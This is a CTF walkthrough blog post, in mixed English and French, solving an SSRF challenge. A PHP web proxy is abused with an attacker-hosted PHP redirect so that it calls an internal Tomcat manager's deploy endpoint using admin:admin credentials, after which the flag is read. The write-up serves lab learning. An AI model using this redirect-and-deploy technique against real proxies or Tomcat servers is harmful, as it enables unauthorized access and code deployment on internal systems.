CTF Challenge Description:

The challenge contains a php webproxy and a Tomcat server which has the Tomcat manager app deployed andwas only accessible via the php webproxy.

https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxycontainer and it has a few open issues, including some that look like they could be security-relevant.

Solution

To visit the tomcat container from the proxy, simply enter 127.0.0.1:8888 to view the tomcat webpage. Tomcat mentions an admin interface should be at /manager/html but upon visiting 127.0.0.1:8888/manager/html through the proxy we get a “401 unauthorized” error.

We also find the username and password (manager-web.xml) and that /manager/text exists as an interface for scripts.

On peut utiliser /manager/text/deploy to deploy the folder that contains the flag and visit that like any other webpage.

Notes d'étude sur la cybersécurité

Notes d'étude OSCP

Then we can host this on our local attacker machine. The server address can be:

http://127.0.0.1:8000/test

<?PHP
Header('location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. Redirect the proxy to  http://127.0.0.1:8000/test
  2. Then redirect it to http://127.0.0.1:8888/foofour/flag.txt
  3. Flag: INS{SSRF-As-A-Service}

CTF Walkthrough Playlist

,
Montrer les Commentaires

Motasem

A propos de l'Auteur

Je crée des notes de cybersécurité, des notes de marketing numérique et des cours en ligne. Je fournis également des conseils en marketing numérique, y compris, mais sans s'y limiter, le référencement, les publicités Google et Meta et l'administration CRM.

Voir les Articles